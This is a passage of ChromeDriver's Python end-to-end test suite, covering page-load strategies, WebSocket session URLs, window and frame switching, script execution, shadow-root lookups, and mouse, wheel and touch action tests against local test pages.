[(http_host_port, http_host_port), (sync_host_port, sync_host_port),
(https_host_port, https_host_port)],
ChromeDriverBaseTestWithWebServer._device)
@staticmethod
def GlobalTearDown():
if _ANDROID_PACKAGE_KEY:
forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device)
ChromeDriverBaseTestWithWebServer._http_server.Shutdown()
ChromeDriverBaseTestWithWebServer._https_server.Shutdown()
@staticmethod
def GetHttpUrlForFile(file_path):
return ChromeDriverBaseTestWithWebServer._http_server.GetUrl() + file_path
class ChromeDriverTestWithCustomCapability(ChromeDriverBaseTestWithWebServer):
def testEagerMode(self):
send_response = threading.Event()
def waitAndRespond():
send_response.wait(10)
self._sync_server.RespondWithContent('#')
thread = threading.Thread(target=waitAndRespond)
self._http_server.SetDataForPath('/top.html',
"""
<html><body>
<div id='top'>
<img src='%s'>
</div>
</body></html>""" % self._sync_server.GetUrl())
eager_driver = self.CreateDriver(page_load_strategy='eager')
thread.start()
start_eager = monotonic()
eager_driver.Load(self._http_server.GetUrl() + '/top.html')
stop_eager = monotonic()
send_response.set()
eager_time = stop_eager - start_eager
self.assertTrue(eager_time < 9)
thread.join()
def testDoesntWaitWhenPageLoadStrategyIsNone(self):
class HandleRequest(object):
def __init__(self):
self.sent_hello = threading.Event()
def slowPage(self, request):
self.sent_hello.wait(2)
return {}, """
<html>
<body>hello</body>
</html>"""
handler = HandleRequest()
self._http_server.SetCallbackForPath('/slow', handler.slowPage)
driver = self.CreateDriver(page_load_strategy='none')
self.assertEquals('none', driver.capabilities['pageLoadStrategy'])
driver.Load(self._http_server.GetUrl() + '/chromedriver/empty.html')
start = monotonic()
driver.Load(self._http_server.GetUrl() + '/slow')
self.assertTrue(monotonic() - start < 2)
handler.sent_hello.set()
self.WaitForCondition(lambda: 'hello' in driver.GetPageSource())
self.assertTrue('hello' in driver.GetPageSource())
def testUnsupportedPageLoadStrategyRaisesException(self):
self.assertRaises(chromedriver.InvalidArgument,
self.CreateDriver, page_load_strategy="unsupported")
def testGetUrlOnInvalidUrl(self):
# Make sure we don't return 'chrome-error://chromewebdata/' (see
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1272).
# Block DNS resolution for all hosts so that the navigation results
# in a DNS lookup error.
driver = self.CreateDriver(
chrome_switches=['--host-resolver-rules=MAP * ~NOTFOUND'])
self.assertRaises(chromedriver.ChromeDriverException,
driver.Load, 'http://invalid/')
self.assertEquals('http://invalid/', driver.GetCurrentUrl())
class ChromeDriverWebSocketTest(ChromeDriverBaseTestWithWebServer):
@staticmethod
def composeWebSocketUrl(server_url, session_id):
return server_url.replace('http', 'ws') + '/session/' + session_id
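  # For reference (values assumed for illustration):
  #   composeWebSocketUrl('http://localhost:9515', 'abc123')
  # returns 'ws://localhost:9515/session/abc123', which is what the
  # webSocketUrl capability is compared against in testWebSocketUrlTrue.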
def testDefaultSession(self):
driver = self.CreateDriver()
self.assertFalse('webSocketUrl' in driver.capabilities)
self.assertRaises(Exception, websocket_connection.WebSocketConnection,
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
def testWebSocketUrlFalse(self):
driver = self.CreateDriver(web_socket_url=False)
self.assertFalse('webSocketUrl' in driver.capabilities)
self.assertRaises(Exception, websocket_connection.WebSocketConnection,
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
def testWebSocketUrlTrue(self):
driver = self.CreateDriver(web_socket_url=True)
self.assertTrue('webSocketUrl' in driver.capabilities)
self.assertNotEqual(None, driver.GetSessionId())
self.assertEquals(driver.capabilities['webSocketUrl'],
self.composeWebSocketUrl(_CHROMEDRIVER_SERVER_URL,
driver.GetSessionId()))
websocket = websocket_connection.WebSocketConnection(
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
self.assertNotEqual(None, websocket)
def testWebSocketUrlInvalid(self):
self.assertRaises(chromedriver.InvalidArgument,
self.CreateDriver, web_socket_url='Invalid')
def testWebSocketOneConnectionPerSession(self):
driver = self.CreateDriver(web_socket_url=True)
websocket = websocket_connection.WebSocketConnection(
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
self.assertNotEqual(None, websocket)
self.assertRaises(Exception, websocket_connection.WebSocketConnection,
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
def testWebSocketInvalidSessionId(self):
driver = self.CreateDriver(web_socket_url=True)
self.assertRaises(Exception, websocket_connection.WebSocketConnection,
_CHROMEDRIVER_SERVER_URL, "random_session_id_123")
def testWebSocketClosedCanReconnect(self):
driver = self.CreateDriver(web_socket_url=True)
websocket = websocket_connection.WebSocketConnection(
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
self.assertNotEqual(None, websocket)
websocket.Close()
websocket2 = websocket_connection.WebSocketConnection(
_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
self.assertNotEqual(None, websocket2)
class ChromeDriverTest(ChromeDriverBaseTestWithWebServer):
"""End to end tests for ChromeDriver."""
def setUp(self):
self._driver = self.CreateDriver()
def testStartStop(self):
pass
def testGetComputedAttributes(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/accessibility.html'))
firstHeaderElement = self._driver.FindElement(
'css selector', '#first-header')
self.assertEquals(firstHeaderElement.GetComputedLabel(), 'header content')
self.assertEquals(firstHeaderElement.GetComputedRole(), 'heading')
def testGetComputedAttributesForIgnoredNode(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/accessibility.html'))
ignoredHeaderElement = self._driver.FindElement(
'css selector', '#ignored-header')
# GetComputedLabel for ignored node should return empty string.
self.assertEquals(ignoredHeaderElement.GetComputedLabel(), '')
self.assertEquals(ignoredHeaderElement.GetComputedRole(), 'none')
def testGetComputedAttributesForUnrenderedNode(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/accessibility.html'))
unrenderedHeaderElement = self._driver.FindElement(
'css selector', '#unrendered-header')
# GetComputedLabel for unrendered node should return empty string.
self.assertEquals(unrenderedHeaderElement.GetComputedLabel(), '')
self.assertEquals(unrenderedHeaderElement.GetComputedRole(), 'none')
def testLoadUrl(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
def testGetCurrentWindowHandle(self):
self._driver.GetCurrentWindowHandle()
# crbug.com/p/chromedriver/issues/detail?id=2995 exposed that some libraries
# introduce circular function references. Functions should not be serialized
  # or treated as an object - this test checks that circular function
  # definitions are allowed (despite not being spec-compliant).
def testExecuteScriptWithSameFunctionReference(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript("""function copyMe() { return 1; }
Function.prototype.foo = copyMe;
const obj = {};
obj['buzz'] = copyMe;
return obj;""")
def _newWindowDoesNotFocus(self, window_type='window'):
current_handles = self._driver.GetWindowHandles()
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/focus_blur_test.html'))
new_window = self._driver.NewWindow(window_type=window_type)
text = self._driver.FindElement('css selector', '#result').GetText()
self.assertTrue(new_window['handle'] not in current_handles)
self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles())
self.assertEquals(text, 'PASS')
def testNewWindowDoesNotFocus(self):
self._newWindowDoesNotFocus(window_type='window')
def testNewTabDoesNotFocus(self):
self._newWindowDoesNotFocus(window_type='tab')
def testCloseWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'css selector', '#link')
close_returned_handles = self._driver.CloseWindow()
self.assertRaises(chromedriver.NoSuchWindow,
self._driver.GetCurrentWindowHandle)
new_handles = self._driver.GetWindowHandles()
self.assertEquals(close_returned_handles, new_handles)
for old_handle in old_handles:
self.assertTrue(old_handle in new_handles)
for handle in new_handles:
self._driver.SwitchToWindow(handle)
self.assertEquals(handle, self._driver.GetCurrentWindowHandle())
close_handles = self._driver.CloseWindow()
# CloseWindow quits the session if on the last window.
      if handle != new_handles[-1]:
from_get_window_handles = self._driver.GetWindowHandles()
self.assertEquals(close_handles, from_get_window_handles)
def testCloseWindowUsingJavascript(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'css selector', '#link')
self._driver.ExecuteScript('window.close()')
with self.assertRaises(chromedriver.NoSuchWindow):
self._driver.GetTitle()
def testGetWindowHandles(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
self.assertNotEqual(None, self.WaitForNewWindow(self._driver, old_handles))
def testGetWindowHandlesInPresenceOfSharedWorker(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/shared_worker.html'))
old_handles = self._driver.GetWindowHandles()
def testSwitchToWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertEquals(
1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;'))
window1_handle = self._driver.GetCurrentWindowHandle()
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'css selector', '#link')
self._driver.SwitchToWindow('oldWindow')
self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle())
def testEvaluateScript(self):
self.assertEquals(1, self._driver.ExecuteScript('return 1'))
self.assertEquals(None, self._driver.ExecuteScript(''))
def testEvaluateScriptWithArgs(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
script = ('document.body.innerHTML = "<div>b</div><div>c</div>";'
'return {stuff: document.querySelectorAll("div")};')
stuff = self._driver.ExecuteScript(script)['stuff']
script = 'return arguments[0].innerHTML + arguments[1].innerHTML'
self.assertEquals(
'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1]))
def testEvaluateInvalidScript(self):
self.assertRaises(chromedriver.ChromeDriverException,
self._driver.ExecuteScript, '{{{')
def testExecuteAsyncScript(self):
self._driver.SetTimeouts({'script': 3000})
self.assertRaises(
chromedriver.ScriptTimeout,
self._driver.ExecuteAsyncScript,
'var callback = arguments[0];'
'setTimeout(function(){callback(1);}, 10000);')
self.assertEquals(
2,
self._driver.ExecuteAsyncScript(
'var callback = arguments[0];'
'setTimeout(function(){callback(2);}, 300);'))
def testExecuteScriptTimeout(self):
self._driver.SetTimeouts({'script': 0})
self.assertRaises(
chromedriver.ScriptTimeout,
self._driver.ExecuteScript,
'return 2')
# Regular script can still run afterwards.
self._driver.SetTimeouts({'script': 1000})
self.assertEquals(
4,
self._driver.ExecuteScript('return 4'))
def testSwitchToFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('name')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrameByIndex(0)
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
def testSwitchToParentFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html'))
self.assertTrue('One' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Three' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('One' in self._driver.GetPageSource())
def testSwitchToNestedFrame(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/nested_frameset.html'))
self._driver.SwitchToFrameByIndex(0)
self._driver.FindElement("css selector", "#link")
self._driver.SwitchToMainFrame()
self._driver.SwitchToFrame('2Frame')
self._driver.FindElement("css selector", "#l1")
self._driver.SwitchToMainFrame()
self._driver.SwitchToFrame('fourth_frame')
self.assertTrue('One' in self._driver.GetPageSource())
self._driver.SwitchToMainFrame()
self._driver.SwitchToFrameByIndex(4)
self._driver.FindElement("css selector", "#aa1")
def testExecuteInRemovedFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);'
'window.addEventListener("message",'
' function(event) { document.body.removeChild(frame); });')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.ExecuteScript('parent.postMessage("remove", "*");')
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
def testSwitchToStaleFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);')
element = self._driver.FindElement("css selector", "#id")
self._driver.SwitchToFrame(element)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
with self.assertRaises(chromedriver.StaleElementReference):
self._driver.SwitchToFrame(element)
def testGetTitle(self):
script = 'document.title = "title"; return 1;'
self.assertEquals(1, self._driver.ExecuteScript(script))
self.assertEquals('title', self._driver.GetTitle())
def testGetPageSource(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertTrue('Link to empty.html' in self._driver.GetPageSource())
def testGetElementShadowRoot(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
def testGetElementShadowRootNotExists(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'div')
with self.assertRaises(chromedriver.NoSuchShadowRoot):
element.GetElementShadowRoot()
def testFindElementFromShadowRoot(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
elementInShadow = shadow.FindElement('css selector', 'input')
self.assertTrue(isinstance(elementInShadow, webelement.WebElement))
def testFindElementFromShadowRootInvalidArgs(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
with self.assertRaises(chromedriver.InvalidArgument):
shadow.FindElement('tag name', 'input')
with self.assertRaises(chromedriver.InvalidArgument):
shadow.FindElement('xpath', '//')
def testDetachedShadowRootError(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self._driver.Refresh()
with self.assertRaises(chromedriver.DetachedShadowRoot):
shadow.FindElement('css selector', 'input')
def testFindElementsFromShadowRoot(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
elementsInShadow = shadow.FindElements('css selector', 'input')
self.assertTrue(isinstance(elementsInShadow, list))
    self.assertEquals(2, len(elementsInShadow))
def testFindElementsFromShadowRootInvalidArgs(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html'))
element = self._driver.FindElement('tag name', 'custom-checkbox-element')
shadow = element.GetElementShadowRoot()
self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot))
with self.assertRaises(chromedriver.InvalidArgument):
shadow.FindElements('tag name', 'input')
with self.assertRaises(chromedriver.InvalidArgument):
shadow.FindElements('xpath', '//')
def testFindElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
self.assertTrue(
isinstance(self._driver.FindElement('tag name', 'div'),
webelement.WebElement))
def testNoSuchElementExceptionMessage(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
self.assertRaisesRegexp(chromedriver.NoSuchElement,
'no such element: Unable '
'to locate element: {"method":"tag name",'
'"selector":"divine"}',
self._driver.FindElement,
'tag name', 'divine')
def testFindElements(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
divs = self._driver.FindElements('tag name', 'div')
self.assertTrue(isinstance(divs, list))
self.assertEquals(2, len(divs))
for div in divs:
self.assertTrue(isinstance(div, webelement.WebElement))
def testFindChildElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";')
element = self._driver.FindElement('tag name', 'div')
self.assertTrue(
isinstance(element.FindElement('tag name', 'br'),
webelement.WebElement))
def testFindChildElements(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><br></div>";')
element = self._driver.FindElement('tag name', 'div')
brs = element.FindElements('tag name', 'br')
self.assertTrue(isinstance(brs, list))
self.assertEquals(2, len(brs))
for br in brs:
self.assertTrue(isinstance(br, webelement.WebElement))
def testClickElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElementInSubFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
# Test clicking element in the sub frame.
self.testClickElement()
def testClickElementAfterNavigation(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
link = self._driver.FindElement('css selector', '#l1')
link.Click()
alert_button = self._driver.FindElement('css selector', '#aa1')
alert_button.Click()
self.assertTrue(self._driver.IsAlertOpen())
def testClickElementJustOutsidePage(self):
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=3878
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
windowHeight = self._driver.ExecuteScript('return window.innerHeight;')
self._driver.ExecuteScript(
'''
document.body.innerHTML = "<div style='height:%dpx'></div>" +
"<a href='#' onclick='return false;' id='link'>Click me</a>";
document.body.style.cssText = "padding:0.25px";
''' % (2 * windowHeight))
link = self._driver.FindElement('css selector', '#link')
offsetTop = link.GetProperty('offsetTop')
targetScrollTop = offsetTop - windowHeight + 1
    self._driver.ExecuteScript('window.scrollTo(0, %d);' % (targetScrollTop))
link.Click()
def testActionsMouseMove(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mouseover", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
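    # One tick with two input sources: the "none" source supplies a 32 ms
    # pause, while the mouse source moves the pointer to (10, 10) inside the
    # div, firing its "mouseover" handler.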
actions = ({"actions": [{
"actions": [{"duration": 32, "type": "pause"}],
"id": "0",
"type": "none"
}, {
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
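    # A single mouse source moves into the div and presses/releases the
    # primary button, which should fire the div's "click" handler.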
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseDoubleClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseTripleClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'window.click_counts = [];'
'div.addEventListener("click", event => {'
' window.click_counts.push(event.detail);'
'});'
'return div;')
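    # Three press/release pairs at the same location; event.detail should
    # report cumulative click counts of 1, 2 and 3.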
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
click_counts = self._driver.ExecuteScript('return window.click_counts')
self.assertEquals(3, len(click_counts))
self.assertEquals(1, click_counts[0])
self.assertEquals(2, click_counts[1])
self.assertEquals(3, click_counts[2])
def testActionsMouseResetCountOnOtherButton(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
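    # The second click uses a different button (button 1), so no dblclick
    # should fire and the div's contents stay unchanged.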
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerDown", "button": 1},
{"type": "pointerUp", "button": 1}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(0, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseResetCountOnMove(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
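    # Moving the pointer between the two clicks should reset the click count,
    # so no dblclick fires and the div's contents stay unchanged.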
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0},
{"type": "pointerMove", "x": 30, "y": 10},
{"type": "pointerDown", "button": 0},
{"type": "pointerUp", "button": 0}],
"parameters": {"pointerType": "mouse"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(0, len(self._driver.FindElements('tag name', 'br')))
def testActionsMouseDrag(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/drag.html'))
target = self._driver.FindElement('css selector', '#target')
# Move to center of target element and drag it to a new location.
actions = ({'actions': [{
"actions": [{"duration": 32, "type": "pause"},
{"duration": 32, "type": "pause"},
{"duration": 32, "type": "pause"}],
"id": "0",
"type": "none"
}, {
'type': 'pointer',
'actions': [
{'type': 'pointerMove', 'x': 100, 'y': 100},
{'type': 'pointerDown', 'button': 0},
{'type': 'pointerMove', 'x': 150, 'y': 175}
],
'parameters': {'pointerType': 'mouse'},
'id': 'pointer1'}]})
time.sleep(1)
self._driver.PerformActions(actions)
time.sleep(1)
rect = target.GetRect()
self.assertAlmostEqual(100, rect['x'], delta=1)
self.assertAlmostEqual(125, rect['y'], delta=1)
# Without releasing mouse button, should continue the drag.
actions = ({'actions': [{
"actions": [{"duration": 32, "type": "pause"}],
"id": "0",
"type": "none"
}, {
'type': 'pointer',
'actions': [
{'type': 'pointerMove', 'x': 15, 'y': 20, 'origin': 'pointer'}
],
'parameters': {'pointerType': 'mouse'},
'id': 'pointer1'}]})
time.sleep(1)
self._driver.PerformActions(actions)
time.sleep(1)
rect = target.GetRect()
self.assertAlmostEqual(115, rect['x'], delta=1)
self.assertAlmostEqual(145, rect['y'], delta=1)
# Releasing mouse button stops the drag.
actions = ({'actions': [{
"actions": [{"duration": 32, "type": "pause"},
{"duration": 32, "type": "pause"}],
"id": "0",
"type": "none"
}, {
'type': 'pointer',
'actions': [
{'type': 'pointerUp', 'button': 0},
{'type': 'pointerMove', 'x': 25, 'y': 25, 'origin': 'pointer'}
],
'parameters': {'pointerType': 'mouse'},
'id': 'pointer1'}]})
time.sleep(1)
self._driver.PerformActions(actions)
time.sleep(1)
rect = target.GetRect()
self.assertAlmostEqual(115, rect['x'], delta=1)
self.assertAlmostEqual(145, rect['y'], delta=1)
def testActionsWheelScroll(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "1000px";'
'div.addEventListener("wheel", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
time.sleep(1)
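    # A wheel source scrolls by (deltaX=5, deltaY=15) at viewport position
    # (10, 10), which should trigger the div's "wheel" handler.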
actions = ({"actions": [{
"type":"wheel",
"actions":[{"type": "scroll", "x": 10, "y": 10, "deltaX": 5,
"deltaY": 15}],
"id": "wheel1"}]})
time.sleep(1)
self._driver.PerformActions(actions)
time.sleep(1)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsTouchTap(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
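    # A touch pointer taps the div (move, down, up), which should dispatch a
    # click that rewrites its contents.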
actions = ({"actions": [{
"type":"pointer",
"actions":[{"type": "pointerMove", "x": 10, "y": 10},
{"type": "pointerDown"},
{"type": "pointerUp"}],
"parameters": {"pointerType": "touch"},
"id": "pointer1"}]})
self._driver.PerformActions(actions)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testActionsMultiTouchPoint(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'''
document.body.innerHTML
= "<div id='div' autofocus style='width:200px; height:200px'>";
window.events = [];
const div = document.getElementById('div');
div.addEventListener('touchstart', event => {
window.events.push(
{type: event.type,
x: event.touches[event.touches.length - 1].clientX,
